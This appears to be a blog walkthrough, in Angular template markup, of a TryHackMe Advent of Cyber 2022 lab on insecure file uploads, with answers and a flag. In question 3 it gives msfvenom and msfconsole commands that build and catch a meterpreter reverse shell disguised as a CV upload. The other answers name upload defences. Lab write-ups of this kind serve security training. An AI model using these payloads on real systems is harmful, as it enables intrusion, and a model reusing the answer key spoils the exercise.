<app-post-body [post]="this.post" [date]="this.post.date" [showTags]="false">
  <app-walkthrough-challenge-author category="Purple Team: Secure Coding"
  platformLink="https://tryhackme.com/room/adventofcyber4"></app-walkthrough-challenge-author>

  <h3>Question 1</h3>
  <blockquote>
   <p>What is the name given to file uploads that allow threat actors to upload any files that they want?</p>
  </blockquote>
  <p>Answer: <code>Unrestricted</code></p>
  <h3>Question 2</h3>
  <blockquote>
   <p>What is the title of the web application developed by Santa's freelancer?</p>
  </blockquote>
  <div class="media-container">
   <img alt="" loading="lazy" src="assets/images/walkthrough/thm/aoc-2022/day15/2.png" style="max-height: 300px"/>
   <span><em></em></span>
  </div>
  <p>Answer: <code>SantaSideKick2</code></p>
  <h3>Question 3</h3>
  <blockquote>
   <p>What is the value of the flag stored in the HR Elf's Documents directory?</p>
  </blockquote>
  <p>We start by using <code>msfvenom</code> to create a malicious executable: <code>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$IP LPORT="4321" -f exe -o cv-maya.exe</code></p>
  <div class="media-container">
   <img alt="" loading="lazy" src="assets/images/walkthrough/thm/aoc-2022/day15/3.1.png" style="max-height: 300px"/>
   <span><em></em></span>
  </div>
  <p>We then tell the shell to create a reverse shell handler, with automatic meterpreter elevation:</p>
  <p><code>sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST $IP; set LPORT '4231'; exploit"</code></p>
  <div class="media-container">
   <img alt="" loading="lazy" src="assets/images/walkthrough/thm/aoc-2022/day15/3.2.png" style="max-height: 300px"/>
   <span><em></em></span>
  </div>
  <p>We then upload our "CV" to the platform:</p>
  <div class="media-container">
   <img alt="" loading="lazy" src="assets/images/walkthrough/thm/aoc-2022/day15/3.3.png" style="max-height: 300px"/>
   <span><em></em></span>
  </div>
  <p>The "CV" gets executed, leading us to a meterpreter session:</p>
  <div class="media-container">
   <img alt="" loading="lazy" src="assets/images/walkthrough/thm/aoc-2022/day15/3.4.png" style="max-height: 300px"/>
   <span><em></em></span>
  </div>
  <p>We situate ourselves and then navigate to the target directory to get the flag:</p>
  <div class="media-container">
   <img alt="" loading="lazy" src="assets/images/walkthrough/thm/aoc-2022/day15/3.5.png" style="max-height: 300px"/>
   <span><em></em></span>
  </div>
  <p>Answer: <code>THM{{ '{' }}Naughty.File.Uploads.Can.Get.You.RCE{{ '}' }}</code></p>
  <h3>Question 4</h3>
  <blockquote>
   <p>What defence technique can be implemented to ensure that specific file types can be uploaded?</p>
  </blockquote>
  <p>Answer: <code>File Extension Validation</code></p>
  <h3>Question 5</h3>
  <blockquote>
   <p>What defence technique can be used to make sure the threat actor cannot recover their file again by simply using the file name?</p>
  </blockquote>
  <p>Answer: <code>File Renaming</code></p>
  <h3>Question 6</h3>
  <blockquote>
   <p>What defence technique can be used to make sure malicious files that can hurt elves are not uploaded?</p>
  </blockquote>
  <p>Answer: <code>Malware Scanning</code></p>


</app-post-body>
